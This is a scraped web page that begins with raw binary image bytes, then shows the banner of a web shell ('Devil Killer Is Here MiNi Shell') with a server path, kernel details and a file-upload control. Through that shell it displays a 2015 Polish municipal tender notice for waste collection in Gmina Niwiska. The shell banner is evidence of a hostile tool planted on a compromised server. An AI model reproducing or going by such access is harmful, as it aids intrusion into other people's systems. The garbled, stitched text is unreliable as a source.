JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150420/88766-N-2015.html

<p class="kh_header"><b>Niwiska: Świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i nieruchomości niezamieszkałych, na których powstają odpady komunalne, znajdujących się na terenie Gminy Niwiska oraz prowadzenie i zagospodarowanie odpadów z  Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK)</b><br>
<b>Numer ogłoszenia: 88766 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Niwiska , Niwiska 430, 36-147 Niwiska, woj. podkarpackie, tel. 017 2279002 w. 33, faks 017 2279341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.niwiska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i nieruchomości niezamieszkałych, na których powstają odpady komunalne, znajdujących się na terenie Gminy Niwiska oraz prowadzenie i zagospodarowanie odpadów z  Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Świadczenie usług w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i nieruchomości niezamieszkałych, na których powstają odpady komunalne, znajdujących się na terenie Gminy Niwiska oraz prowadzenie i zagospodarowanie odpadów z  Punktu Selektywnej Zbiorki Odpadów Komunalnych  (zwanego dalej PSZOK).

Przedmiot zamówienia obejmuje nieruchomości określone w załączniku nr 4 do SIWZ.
Szczegółowe wykazy nieruchomości  wraz   z  liczbą mieszkańców zamieszkujących daną nieruchomość będą przekazywane Wykonawcy w toku realizacji umowy (zamówienia).
Dane ilościowe pozwalające ocenić (oszacować) wartość Zamówienia (nie stanowiące limitów
Zamówienia):
1) liczba mieszkańców w Gminie Niwiska, którzy będą objęci usługą odbierania odpadów komunalnych - około 6100 (wg danych ewidencji ludności - osoby zameldowane), w tym szacunkowa liczba osób zamieszkałych na terenie Gminy Niwiska - 4450(przewiduje się wzrost max. ok. 5%);
2) liczba nieruchomości zamieszkałych - 1400 (przewiduje się wzrost max. ok. 10%);
3) liczba  nieruchomości niezamieszkałych: ok. 70 ( zakłada się wzrost ok. 20%);
4) liczba pojemników na odpady podlegające selektywnej zbiórce (tzw. dzwonków: plastik, szkło): 32 - będących własnością Zamawiającego;
5) liczba kontenerów na odpady KP 7 - 4 szt, -  będących własnością Zamawiającego;
6) kosze uliczne na odpady o poj. min. 10 l - ok. 20 - zlokalizowane na przystankach autobusowych w poszczególnych miejscowościach Gminy Niwiska
7) szacunkowa liczba pojemników 120 l - 1450 szt. ,  240 l - 30 szt.   1100 l - 10 szt.; 
8) liczba   worków   120   l   na   odpady   podlegające   selektywnej   zbiórce,   przeznaczone   do wyposażenia gospodarstw domowych w posesjach jedno lub kilkurodzinnych, około 5000 szt./miesiąc;
9) liczba worków 120 l na odpady zmieszane - ok. 50 sztuk/miesiąc;
10) ciągnik CASE III JX70 453 z przyczepą dwuosiową PRONAR T653/2 - będący własnością Zamawiającego - do prowadzenia systematycznej zbiórki odpadów przy drogach gminnych (w tym przystanki) i miejsca publiczne - udostępniany Wykonawcy przez Zamawiającego na podstawie odrębnie zawartej umowy użyczenia;
11) ilość odpadów odebranych z terenu Gminy Niwiska w latach 2012-2014:

Rodzaj	2012
w tonach	2013
w tonach	2014
w tonach
Odpady zmieszane	300,75	290,49	336, 80
szkło	51,34	52,70	59, 80
Tworzywa sztuczne	23,25	12,80	37, 70
Papier	0,76	2, 70	28,40
Złom	12, 00	13, 07	0,50
Wielkogabarytowe	0, 72	0, 2	15, 80
Opony	2, 40	3, 40	8,10
Urządzenia zawierające freony	0,03	1,30	0,80
Elektryczne	0,54	0,20	2,77
 UWAGA! Dane powyższe nie stanowią żadnej wartości granicznej, po odebraniu której Wykonawca może zaprzestać odbioru odpadów. 
Zamówienie obejmuje:
1. Prowadzenie selektywnej zbiórki odpadów komunalnych zgodnie z art. 3 ust. 2 pkt 5 o utrzymaniu czystości i porządku w gminach.
Zbiórka  odpadów  komunalnych  bezpośrednio  z  nieruchomości,  na  których  zamieszkują i nie zamieszkują mieszkańcy (wskazanych w załączniku nr 5 do SIWZ) odbywać się będzie z podziałem na:
1)  odpady komunalne podlegające selektywnej zbiórce - szkło, makulatura, metale, tworzywa sztuczne, opakowania wielomateriałowe do oznakowanego pojemnika lub worka zgodnie z jego przeznaczeniem rodzajowym;
2)  odpady komunalne zmieszane - zmieszane odpady komunalne, z wyłączeniem: 
odpadów komunalnych podlegających selektywnej zbiórce,	odpadów	komunalnych ulegających biodegradacji, odpadów zielonych i kuchennych, przeterminowanych leków, chemikaliów, zużytego sprzętu elektrycznego  i  elektronicznego,  mebli  i  innych  odpadów  wielkogabarytowych,  odpadów budowlanych i rozbiórkowych, zużytych opon, zużytych baterii i akumulatorów;
3)  odpady komunalne wielkogabarytowe - tj. m.in.: stare meble, wózki dziecięce,  materace itp.;
4)  zużyty sprzęt elektryczny i elektroniczny;
5)  zużyte opony.
2. Organizowanie i prowadzenie mobilnego punktu zbierania odpadów obejmującego akcyjny odbiór chemikaliów w szczególności farb, lakierów, środków ochrony roślin w wyznaczonych miejscach w sołectwach.
3. Umożliwienie mieszkańcom Gminy Niwiska stałe miesięczne wyposażenie zamieszkałych i nie zamieszkałych nieruchomości  w  pojemniki, worki lub  kontenery  na  odpady  zmieszane spełniające  wymagania określone  w Regulaminie utrzymania czystości i porządku na terenie Gminy Niwiska  na następujących zasadach:
1)  wyposażenie nieruchomości w pojemnik lub kontener o pojemnościach 120l, 240l i 1100l będzie następowało po odrębnym pisemnym zgłoszeniu zapotrzebowania przez Zamawiającego, w przypadku zgłoszenia przez mieszkańca Gminy Niwiska Zamawiającemu zapotrzebowania na taką usługę;
2)  wyposażenie nieruchomości w worek czarny - przeznaczony na zmieszane odpady komunalne,  w przypadku nieruchomości o utrudnionym dojeździe; 
3) Wykonawca w terminie do 7 dni od dnia złożenia mu przez Zamawiającego zapotrzebowania w formie pisemnej zobowiązany jest do wyposażenia nieruchomości w pojemnik lub kontener na odpady  zmieszane.
7) Wykonawca zobowiązany jest do naprawy lub wymiany dostarczonego przez siebie kontenera lub pojemnika na odpady, który uległ uszkodzeniu, na własny koszt, w terminie 7 dni od dnia złożenia mu przez Zamawiającego zapotrzebowania w formie pisemnej.
4. Wyposażenie  nieruchomości,  na  których  zamieszkują  mieszkańcy oraz nieruchomości, na których nie zamieszkują mieszkańcy w  worki o pojemności nie mniejszej niż 120 litrów (o  grubości zapewniającej  wytrzymałość   worków  tj.  co  najmniej  60  mikronów) na odpady podlegające selektywnej zbiórce:  
1)  dostarczanie  do  gospodarstw  domowych  w  posesjach  jednorodzinnych i kilkurodzinnych,  domach wielorodzinnych, do nieruchomości, na których nie zamieszkują mieszkańcy - worków do selektywnej zbiórki odpadów na odpady podlegające selektywnej zbiórce. Worki powinny być oznaczone nadrukiem, jakiego rodzaju odpady należy w nich gromadzić oraz winny posiadać kolorystykę:
a) żółty - przeznaczony na tworzywa sztuczne,
b) czerwony - przeznaczony na metale (puszki oraz drobny złom),
c) biały - przeznaczony na szkło,
d) niebieski - przeznaczony na papier i tekturę,
e) pomarańczowy - przeznaczony na opakowania wielomateriałowe,
Wyposażenie  nieruchomości w worki o różnych kolorach jest niezbędne celem umożliwienia mieszkańcom	dokonania wstępnego posortowania odpadów podlegających selektywnej zbiórce na poszczególne frakcje;
2)  zaopatrzenie  punktów  gromadzenia  odpadów  przy  nieruchomościach, na których nie zamieszkują mieszkańcy w  oddzielne worki  na odpady podlegające selektywnej zbiórce. 
Wykonawca  jest zobowiązany do  oznakowania dostarczonych przez siebie pojemników na odpady w sposób czytelny i widoczny,  umożliwiający łatwą identyfikację przedsiębiorcy, poprzez umieszczenie na  nich  nazwy  firmy  i  numeru  telefonu  przedsiębiorcy. 
3)  ilość   worków  do  gromadzenia  odpadów  podlegających selektywnej zbiórce, w które Wykonawca wyposaża  nieruchomości, musi być dostosowana do liczby obsługiwanych  mieszkańców i wynikającej z harmonogramu częstotliwości ich odbierania przy założeniu braku limitu ilości odbieranych odpadów segregowanych.
5. Umożliwienie właścicielom nieruchomości,  na  których  zamieszkują  mieszkańcy oraz właścicielom nieruchomości, na których nie zamieszkują mieszkańcy wyposażenia   w  pojemniki  na odpady zmieszane zgodnie z następującymi zasadami:
1)  dostarczanie  do  gospodarstw  domowych -  w  posesjach  jednorodzinnych  i  kilkurodzinnych  lub do nieruchomości, na których nie zamieszkują mieszkańcy - pojemników   na odpady zmieszane następować będzie za odrębnym pisemnym zleceniem Zamawiającego, w przypadku zgłoszenia przez właściciela ww. nieruchomości Zamawiającemu zapotrzebowania na taką usługę,
2)  Wykonawca zobowiązany jest do wyposażenia nieruchomości w pojemniki w terminie do 3 dni od dnia zgłoszenia mu w formie pisemnej zapotrzebowania przez Zamawiającego.
6. Odbiór  odpadów  określonych  w  ust. 1, zgodnie  ze  sporządzonym  przez  Wykonawcę  (po zaakceptowaniu  przez  Zamawiającego)  harmonogramem  wywozu  odpadów,  będzie realizowany na następujących zasadach:
1) zgromadzone w obszarach zabudowy zagrodowej i jednorodzinnej zmieszane odpady komunalne  - raz w miesiącu;
2) zgromadzone w workach i pojemnikach odpady podlegające selektywnej zbiórce (papier i makulatura, szkło, tworzywa sztuczne, metale /puszki i drobny złom/, opakowania wielomateriałowe) - co drugi miesiąc( 6 razy w roku);
3) wystawione przez mieszkańców  nieruchomości  odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony - dwa razy w roku,
4) odpady komunalne z terenów przeznaczonych do użytku publicznego z terenów mienia komunalnego oraz z terenów parku i przystanków komunikacji, opróżnianie koszy ulicznych -raz na kwartał, nie mniej niż 16 razy w roku.
5) opróżnianie pojemników przeznaczonych do selektywnej zbiórki surowców wtórnych, stojących na terenach przeznaczonych do użytku publicznego, następować będzie sukcesywnie w miarę ich zapełnienia, w terminie do 7 dni od dnia zgłoszenia telefonicznie Wykonawcy takiej potrzeby przez Zamawiającego, jednak nie rzadziej niż jeden raz na dwa miesiące.
7. Wyposażenie  nieruchomości,  na  których  zamieszkują  mieszkańcy  wytwarzający  odpady zmieszane ponad przyjętą normę, tj. 60 litrów odpadów na osobę miesięcznie w odpowiednie pojemniki, worki lub  kontenery na odpady zmieszane:
1)  Wykonawca będzie wyposażał wskazane pisemnie przez Zamawiającego nieruchomości w pojemniki, worki lub kontenery na odpady zmieszane o pojemnościach: 120 l, 240 l lub 1100 l, w przypadku zgłoszenia przez mieszkańca gminy Zamawiającemu zapotrzebowania na taką usługę,
2) Wykonawca zobowiązany jest do wyposażenia nieruchomości w odpowiedni pojemnik, worek lub kontener na odpady zmieszane w terminie do 3 dni od dnia zgłoszenia mu w formie pisemnej zapotrzebowania przez Zamawiającego,
3)  Wykonawca jest zobowiązany do oznakowania dostarczonych przez siebie pojemników, worków i kontenerów na odpady w sposób czytelny i widoczny, umożliwiający łatwą identyfikację przedsiębiorcy, poprzez umieszczenie na nich nazwy firmy i numeru telefonu  przedsiębiorcy.
8. Prowadzenie i zagospodarowanie odpadów z gminnego Punktu Selektywnego Zbierania Odpadów Komunalnych, zwanego  dalej PSZOK na terenie Zakładu Usług Komunalnych, Niwiska 112 (część działki nr 542/6) - 2 razy w roku , a w przypadku wcześniejszego zapełnienia kontenerów, na telefoniczne zgłoszenie.
1) wykonawca wyposaży PSZOK w niezbędną ilość urządzeń (w tym pojemniki i kontenery) umożliwiających prawidłowy odbiór i zagospodarowanie dostarczanych do niego odpadów, w sposób zgodny z wymogami obowiązujących w tym zakresie przepisów prawa, a w szczególności w:
a) kontenery na odpady budowlano - remontowe o pojemności minimalnej 3,5 m3,
b) pojemniki specjalistyczne
9. Transport odpadów zebranych z nieruchomości, na których zamieszkują mieszkańcy oraz z nieruchomości, na których nie zamieszkują mieszkańcy, bądź z PSZOK-u;
1) podlegających selektywnej zbiórce do instalacji odzysku i unieszkodliwiania odpadów;
2) zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do istniejących regionalnych instalacji do przetwarzania odpadów komunalnych (bądź instalacji zastępczych) Regionu Zachodniego gospodarki odpadami komunalnymi zgodnie z Planem Gospodarki Odpadami dla Województwa Podkarpackiego.
10. Odzysk lub unieszkodliwianie zebranych odpadów komunalnych zebranych z nieruchomości, na których zamieszkują mieszkańcy oraz z nieruchomości, na których nie zamieszkują mieszkańcy, bądź z PSZOK-u  zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach:
1) Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do   masy odebranych przez siebie odpadów komunalnych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metalu, tworzyw sztucznych, szkła innych niż niebezpieczne odpadów budowlanych i rozbiórkowych zgodnie z przepisami rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2012 r., poz. 645);
2) Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z  rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U. z 2012 r., poz. 676);
11. Bieżące prowadzenie ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach.
12. Bieżące prowadzenie ewidencji właścicieli nieruchomości, na  których  zamieszkują  mieszkańcy oraz właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, wytwarzających odpady zmieszane i sprawdzanie wykonywania obowiązku zbierania odpadów w sposób selektywny (zgodnie ze złożoną deklaracją i wymaganiami Regulaminu utrzymania czystości i porządku na terenie Gminy Niwiska) oraz niezwłoczne powiadomienie Zamawiającego (nie później niż następnego dnia roboczego) z nie wywiązywania się z zadeklarowanej segregacji odpadów. 
13. Przekazywanie zgodnie z ustawą o utrzymaniu czystości i porządku w gminach składanie Zamawiającemu półrocznych sprawozdań do końca miesiąca następującego po upływie półrocza dotyczących:
1) informacji o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania;
2) informacji o masie odpadów komunalnych ulegających biodegradacji:
a) przekazanych do składowania na składowisku odpadów,
b) nieprzekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania, 
3) liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne;
4) wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie Gminy Niwiska;
5) kopii dowodów dostarczania odpadów do odzysku lub unieszkodliwiana tj. karty ewidencji
odpadów bądź karty przekazania odpadów.
14. Dodatkowe obowiązki Wykonawcy w zakresie realizacji przedmiotu zamówienia:
1) porządkowanie terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków i pojazdów w trakcie realizacji usługi wywozu;
2) zbieranie odpadów leżących luzem obok zapełnionych pojemników, kontenerów w mini punktach selektywnej zbiórki odpadów i umieszczanie ich w pojemnikach niezwłocznie po ich opróżnieniu oraz doprowadzanie do porządku terenów przyległych, zanieczyszczonych  na skutek  przepełnienia wymienionych wyżej urządzeń, służących do gromadzenia odpadów;
3) naprawa lub ponoszenie kosztów naprawy,  według wyboru Zamawiającego, szkód wyrządzonych podczas wykonywania usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i nieruchomości niezamieszkałych, na których powstają odpady komunalne, znajdujących się na terenie Gminy Niwiska (np. uszkodzenia chodników osiedlowych, punktów do składowania odpadów itp.);
4) wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy oraz w identyfikatory do dnia poprzedzającego dzień rozpoczęcia świadczenia usługi;
5) odbiór i transport odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych oraz do posesji indywidualnych będzie znacznie utrudniony z  powodu prowadzonych  remontów dróg, dojazdów itp. (w  takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy, chyba, że strony umowy w danym przypadku postanowią inaczej);
6) prowadzenie kampanii informacyjnych (poprzez wywieszanie ogłoszeń, zamieszczanie ogłoszeń na stronach internetowych, itp.) o terminach i miejscach zbiórki: odpadów wielkogabarytowych, zużytych opon, zużytego sprzętu elektrycznego i elektronicznego oraz o zmianach terminów wywozów wynikających z przypadających dni świątecznych;
7) uczestnictwo upoważnionego przedstawiciela Wykonawcy w naradach organizowanych przez   Zamawiającego (tj. w posiedzeniach komisji Rady Gminy Niwiska, innych naradach) w przypadku   jego zaproszenia, na których omawiane będą zadania związane  z  realizacją  przedmiotu  umowy. Zaproszenie na naradę organizowaną przez Zamawiającego będzie przekazywane każdorazowo Wykonawcy z wyprzedzeniem nie mniej niż na 5dni przed terminem narady;
8) wykonywanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz ograniczający do niezbędnego minimum niedogodności dla społeczeństwa;
9) ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy.
15. Dodatkowe  obowiązki  Wykonawcy  w  zakresie  używanych  pojazdów  do  realizacji przedmiotu zamówienia:
1)  zapewnienie  przez  cały  czas  trwania  umowy  dla  właściwej  realizacji  przedmiotu  umowy dostatecznej  ilości  środków  technicznych,  gwarantujących  terminowe i właściwe jakościowo  wykonanie zakresu  rzeczowego  usługi,  w ilości  minimum  jak  w  złożonej  w postępowaniu  przetargowym ofercie;
2)  użytkowanie  pojazdów  specjalistycznych wymaganych  dla  tego  typu  usług;  pojazdy  te  winny  być  we właściwym stanie technicznym i oznakowane w sposób czytelny i widoczny, umożliwiający łatwą identyfikację przedsiębiorcy poprzez umieszczenie na nich nazwy firmy, adresu i numeru telefonu przedsiębiorcy;
3)  odbieranie  i  transportowanie  odpadów  pojazdami  bezpylnymi  i  kontenerowymi  zgodnie  z przepisami art. 61 ustawy Prawo o ruchu drogowym, transport odpadów wielkogabarytowych, odpadów umieszczonych w szczelnych workach plastikowych, może odbywać się pojazdami ciężarowymi;
16. Wykonawca zobowiązany jest odbierać, we wskazanych przez Zamawiającego punktach (w aptekach i placówkach służby zdrowia), pojemników z  przeterminowanymi lub zbędnymi lekarstwami, a także punkty te oznaczyć za pomocą tabliczek informacyjnych.
17. Wykonawca jest	zobowiązany - w terminie  do 7 dni roboczych od dnia otrzymania informacji od Zamawiającego - do odebrania i zagospodarowania  z  punktów, o których mowa w ust. 16 odpadów (przeterminowanych lekarstw),
18.  Wykonawca jest	zobowiązany do wyposażenia,  odbioru i zagospodarowania zużytych baterii z punktów wskazanych przez Zamawiającego- szkoły na terenie Gminy Niwiska  oraz UG Niwiska..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający  przewiduje  udzielenie  zamówień  uzupełniających zgodnych z przedmiotem zamówienia podstawowego opisanym  szczegółowo  w rozdziale i SIWZ.
2. Zamawiający udzieli  zamówień uzupełniających w przypadku pojawienia się  zapotrzebowania na usługi objęte   przedmiotem   zamówienia podstawowego  ponad   bieżące   zamówienie   w  okresie   objętym   umową. 
3. Zamówienie uzupełniające stanowić będzie nie więcej niż 10 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 34.92.84.80-6, 90.50.00.00-2, 90.51.12.00-4, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca,  pod rygorem  wykluczenia  z postępowania,  zobowiązany jest wnieść  wadium w wysokości 12 000,00 - zł (słownie: dwanaście tysięcy złotych).
2.Wadium powinno być wniesione na podstawie art. 45 ustawy PZP przed upływem terminu składania ofert, tj.: do dnia 29 kwietnia 2015 r. do godz. 900 .
3.  Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.)
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego :Numer rachunku bankowego :Bank Spółdzielczy O/ Niwiska nr  38 9180 1034 2003 2001 3909 0002 z adnotacją: Wadium - nr sprawy: SR.271.10.2015. Zamawiający  uzna,  że termin wpłaty wadium został dotrzymany, jeżeli przed jego upływem został  uznany rachunek bankowy Zamawiającego poprzez zaksięgowanie kwoty wadium (przelew wadium musi być zaksięgowany na rachunku bankowym Zamawiającego przed upływem terminu składania ofert).
5.Wadium wniesione w poręczeniach lub gwarancjach należy złożyć w formie oryginału przed upływem  terminu  składania  ofert  tj.:  do  dnia  29 kwietnia 2015 r. do godz. 900 w siedzibie Zamawiającego, adres Zamawiającego jak na str 1 SIWZ, w pokoju nr 10. Prosimy nie załączać oryginału gwarancji ani poręczenia do oferty.
6.Wadium wniesione w formie poręczeń lub gwarancji będzie akceptowane przez Zamawiającego,  jeżeli  będzie  zawierać  wszystkie  określone  ustawą  PZP  przypadki  utraty wadium  przez Wykonawcę, którego oferta została wybrana, klauzulę o nieodwołalności oraz zapewnienie   bezwarunkowej	wypłaty przez Gwaranta (Poręczyciela) na  pierwsze  pisemne żądanie zamawiającego pełnej kwoty wadium w przypadkach wymienionych w art. 46 ust. 4a i 5 ustawy PZP.
7.Zwrot lub zatrzymanie wadium nastąpi zgodnie z zasadami określonymi w art. 46 ustawy PZP.
